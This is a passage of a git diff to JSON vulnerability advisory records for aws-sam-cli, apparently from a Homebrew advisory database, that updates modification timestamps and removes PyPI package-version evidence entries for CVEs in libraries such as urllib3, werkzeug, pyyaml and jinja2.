"registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2019-11324.json b/advisories/BREW-aws-sam-cli-CVE-2019-11324.json index 299948c481..961b39a2e1 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2019-11324.json +++ b/advisories/BREW-aws-sam-cli-CVE-2019-11324.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2019-11324", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-mh33-7rrq-662w", "CVE-2019-11324", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2019-14322.json b/advisories/BREW-aws-sam-cli-CVE-2019-14322.json index f738c4b4be..76e687302e 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2019-14322.json +++ b/advisories/BREW-aws-sam-cli-CVE-2019-14322.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2019-14322", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-j544-7q9p-6xp8", "CVE-2019-14322", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "werkzeug", - "subject_version": "3.1.8", - "key": "pkg:pypi/werkzeug@3.1.8", - "resource": "werkzeug" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2019-14806.json b/advisories/BREW-aws-sam-cli-CVE-2019-14806.json index 9763b3c506..16171c0b6a 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2019-14806.json +++ b/advisories/BREW-aws-sam-cli-CVE-2019-14806.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2019-14806", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-gq9m-qvpx-68hc", "CVE-2019-14806", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "werkzeug", - "subject_version": "3.1.8", - "key": "pkg:pypi/werkzeug@3.1.8", - "resource": "werkzeug" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2019-20477.json b/advisories/BREW-aws-sam-cli-CVE-2019-20477.json index dd81e7c561..d658bdb4b8 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2019-20477.json +++ b/advisories/BREW-aws-sam-cli-CVE-2019-20477.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2019-20477", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-3pqx-4fqf-j49f", "CVE-2019-20477", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2020-14343.json b/advisories/BREW-aws-sam-cli-CVE-2020-14343.json index 3f83ce8a38..1e0a5714e9 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2020-14343.json +++ b/advisories/BREW-aws-sam-cli-CVE-2020-14343.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2020-14343", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-8q59-q68h-6hv4", "CVE-2020-14343", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2020-1747.json b/advisories/BREW-aws-sam-cli-CVE-2020-1747.json index 26ee7eea31..38b53d0cb3 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2020-1747.json +++ b/advisories/BREW-aws-sam-cli-CVE-2020-1747.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2020-1747", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-6757-jp84-gxfx", "CVE-2020-1747", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2020-26137.json b/advisories/BREW-aws-sam-cli-CVE-2020-26137.json index 777a679c1b..02490ed81f 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2020-26137.json +++ b/advisories/BREW-aws-sam-cli-CVE-2020-26137.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2020-26137", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-wqvq-5m8c-6g24", "CVE-2020-26137", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2020-28493.json b/advisories/BREW-aws-sam-cli-CVE-2020-28493.json index 7066cf933a..187c1df09c 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2020-28493.json +++ b/advisories/BREW-aws-sam-cli-CVE-2020-28493.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2020-28493", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-g3rq-g295-4j3m", "CVE-2020-28493", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2020-28724.json b/advisories/BREW-aws-sam-cli-CVE-2020-28724.json index f716a076ee..329b3fe85c 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2020-28724.json +++ b/advisories/BREW-aws-sam-cli-CVE-2020-28724.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2020-28724", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-3p3h-qghp-hvh2", "CVE-2020-28724", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "werkzeug", - "subject_version": "3.1.8", - "key": "pkg:pypi/werkzeug@3.1.8", - "resource": "werkzeug" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2020-7212.json b/advisories/BREW-aws-sam-cli-CVE-2020-7212.json index 164cc9a9e1..b9a7f2d596 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2020-7212.json +++ b/advisories/BREW-aws-sam-cli-CVE-2020-7212.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2020-7212", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-hmv2-79q8-fv6g", "CVE-2020-7212", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2021-20270.json b/advisories/BREW-aws-sam-cli-CVE-2021-20270.json index 8ba5d66fb3..b800d73fb7 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2021-20270.json +++ b/advisories/BREW-aws-sam-cli-CVE-2021-20270.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2021-20270", "published": "2026-08-13T16:37:01Z", - "modified": "2026-09-05T08:41:19Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-9w8r-397f-prfh", "CVE-2021-20270", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2021-27291.json b/advisories/BREW-aws-sam-cli-CVE-2021-27291.json index b8feffdc52..1a897f592a 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2021-27291.json +++ b/advisories/BREW-aws-sam-cli-CVE-2021-27291.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2021-27291", "published": "2026-08-13T16:37:01Z", - "modified": "2026-09-05T08:41:19Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-pq64-v7f5-gqh8", "CVE-2021-27291", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2021-28363.json b/advisories/BREW-aws-sam-cli-CVE-2021-28363.json index d16f7e5f9a..10065d3d61 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2021-28363.json +++ b/advisories/BREW-aws-sam-cli-CVE-2021-28363.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2021-28363", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-5phf-pp7p-vc2r", "CVE-2021-28363", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2021-29063.json b/advisories/BREW-aws-sam-cli-CVE-2021-29063.json index 168add98f7..93356184b5 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2021-29063.json +++ b/advisories/BREW-aws-sam-cli-CVE-2021-29063.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2021-29063", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-f865-m6cq-j9vx", "CVE-2021-29063", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mpmath", - "subject_version": "1.3.0", - "key": "pkg:pypi/mpmath@1.3.0", - "resource": "mpmath" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2021-33503.json b/advisories/BREW-aws-sam-cli-CVE-2021-33503.json index 36ebe7cb14..01bef3aff9 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2021-33503.json +++ b/advisories/BREW-aws-sam-cli-CVE-2021-33503.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2021-33503", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-q2q7-5pp4-w6pg", "CVE-2021-33503", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2022-24065.json b/advisories/BREW-aws-sam-cli-CVE-2022-24065.json index c7ad052966..eed515f546 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2022-24065.json +++ b/advisories/BREW-aws-sam-cli-CVE-2022-24065.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2022-24065", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-f4q6-9qm4-h8j4", "CVE-2022-24065", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "cookiecutter", - "subject_version": "2.7.1", - "key": "pkg:pypi/cookiecutter@2.7.1", - "resource": "cookiecutter" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2022-40896.json b/advisories/BREW-aws-sam-cli-CVE-2022-40896.json index cef4519e14..f2101f1e24 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2022-40896.json +++ b/advisories/BREW-aws-sam-cli-CVE-2022-40896.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2022-40896", "published": "2026-08-13T16:37:01Z", - "modified": "2026-09-05T08:41:19Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-mrwq-x4v8-fh7p", "CVE-2022-40896", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2022-40897.json b/advisories/BREW-aws-sam-cli-CVE-2022-40897.json index 94fa6deb0b..747bd19cbf 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2022-40897.json +++ b/advisories/BREW-aws-sam-cli-CVE-2022-40897.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2022-40897", "published": "2026-08-13T16:37:01Z", - "modified": "2026-09-05T08:41:19Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-r9hx-vwmv-q579", "BIT-setuptools-2022-40897", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "84.0.0", - "key": "pkg:pypi/setuptools@84.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2022-40898.json b/advisories/BREW-aws-sam-cli-CVE-2022-40898.json index 993a1eaafb..b5cd179944 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2022-40898.json +++ b/advisories/BREW-aws-sam-cli-CVE-2022-40898.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2022-40898", "published": "2026-08-13T16:37:01Z", - "modified": "2026-09-05T08:41:19Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-qwmp-2cf2-g9g6", "CVE-2022-40898", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "wheel", - "subject_version": "0.48.0", - "key": "pkg:pypi/wheel@0.48.0", - "resource": "wheel" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2023-23934.json b/advisories/BREW-aws-sam-cli-CVE-2023-23934.json index 754e8fd99b..534124cc48 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2023-23934.json +++ b/advisories/BREW-aws-sam-cli-CVE-2023-23934.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2023-23934", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-px8h-6qxv-m22q", "CVE-2023-23934", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "werkzeug", - "subject_version": "3.1.8", - "key": "pkg:pypi/werkzeug@3.1.8", - "resource": "werkzeug" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2023-25577.json b/advisories/BREW-aws-sam-cli-CVE-2023-25577.json index fa7cf0e66e..7a6155c974 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2023-25577.json +++ b/advisories/BREW-aws-sam-cli-CVE-2023-25577.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2023-25577", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-xg9f-g7g7-2323", "CVE-2023-25577", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "werkzeug", - "subject_version": "3.1.8", - "key": "pkg:pypi/werkzeug@3.1.8", - "resource": "werkzeug" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2023-26302.json b/advisories/BREW-aws-sam-cli-CVE-2023-26302.json index 4ef8c704a1..1a75ecb4f2 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2023-26302.json +++ b/advisories/BREW-aws-sam-cli-CVE-2023-26302.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2023-26302", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-jrwr-5x3p-hvc3", "CVE-2023-26302", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "markdown-it-py", - "subject_version": "4.2.0", - "key": "pkg:pypi/markdown-it-py@4.2.0", - "resource": "markdown-it-py" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2023-26303.json b/advisories/BREW-aws-sam-cli-CVE-2023-26303.json index 4cc58539a4..5b35ddaaad 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2023-26303.json +++ b/advisories/BREW-aws-sam-cli-CVE-2023-26303.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2023-26303", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-vrjv-mxr7-vjf8", "CVE-2023-26303", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "markdown-it-py", - "subject_version": "4.2.0", - "key": "pkg:pypi/markdown-it-py@4.2.0", - "resource": "markdown-it-py" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2023-30861.json b/advisories/BREW-aws-sam-cli-CVE-2023-30861.json index 4fccb9a130..4055468950 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2023-30861.json +++ b/advisories/BREW-aws-sam-cli-CVE-2023-30861.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2023-30861", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-m2qf-hxjv-5gpq", "CVE-2023-30861", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "flask", - "subject_version": "3.1.3", - "key": "pkg:pypi/flask@3.1.3", - "resource": "flask" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2023-32681.json b/advisories/BREW-aws-sam-cli-CVE-2023-32681.json index e2794f671b..3f617c0cc5 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2023-32681.json +++ b/advisories/BREW-aws-sam-cli-CVE-2023-32681.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2023-32681", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-j8r2-6x86-q33q", "CVE-2023-32681", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2023-43804.json b/advisories/BREW-aws-sam-cli-CVE-2023-43804.json index b036199907..333d327afe 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2023-43804.json +++ b/advisories/BREW-aws-sam-cli-CVE-2023-43804.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2023-43804", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-v845-jxx5-vc9f", "CVE-2023-43804", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2023-45803.json b/advisories/BREW-aws-sam-cli-CVE-2023-45803.json index 5ea966f9e7..058123067c 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2023-45803.json +++ b/advisories/BREW-aws-sam-cli-CVE-2023-45803.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2023-45803", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-g4mx-q9vg-27p4", "CVE-2023-45803", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2023-46136.json b/advisories/BREW-aws-sam-cli-CVE-2023-46136.json index 9d4e1829af..0df5c82776 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2023-46136.json +++ b/advisories/BREW-aws-sam-cli-CVE-2023-46136.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2023-46136", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-hrfv-mqp8-q5rw", "CVE-2023-46136", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "werkzeug", - "subject_version": "3.1.8", - "key": "pkg:pypi/werkzeug@3.1.8", - "resource": "werkzeug" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2024-22195.json b/advisories/BREW-aws-sam-cli-CVE-2024-22195.json index c6b77d92bf..01c8a48c8a 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2024-22195.json +++ b/advisories/BREW-aws-sam-cli-CVE-2024-22195.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2024-22195", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-h5c8-rqwp-cp95", "CVE-2024-22195", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2024-34064.json b/advisories/BREW-aws-sam-cli-CVE-2024-34064.json index 39afcb0a45..9f73ceee83 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2024-34064.json +++ b/advisories/BREW-aws-sam-cli-CVE-2024-34064.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2024-34064", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-h75v-3vvj-5mfj", "CVE-2024-34064", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2024-34069.json b/advisories/BREW-aws-sam-cli-CVE-2024-34069.json index 3a2f5fa2d5..5a3d1c70e9 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2024-34069.json +++ b/advisories/BREW-aws-sam-cli-CVE-2024-34069.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2024-34069", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-2g68-c3qc-8985", "CVE-2024-34069", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "werkzeug", - "subject_version": "3.1.8", - "key": "pkg:pypi/werkzeug@3.1.8", - "resource": "werkzeug" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2024-35195.json b/advisories/BREW-aws-sam-cli-CVE-2024-35195.json index 98baf14103..51955172ae 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2024-35195.json +++ b/advisories/BREW-aws-sam-cli-CVE-2024-35195.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2024-35195", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:05Z", "upstream": [ "GHSA-9wx4-h78v-vm56", "CVE-2024-35195", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-sam-cli-CVE-2024-3651.json b/advisories/BREW-aws-sam-cli-CVE-2024-3651.json index 0628fe1455..340688285f 100644 --- a/advisories/BREW-aws-sam-cli-CVE-2024-3651.json +++ b/advisories/BREW-aws-sam-cli-CVE-2024-3651.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-sam-cli-CVE-2024-3651", "published": "2026-08-13T16:37:01Z", - "modified": "2026-09-05T08:41:19Z", + "modified": "2026-09-10T18:54:05Z", "upstream": 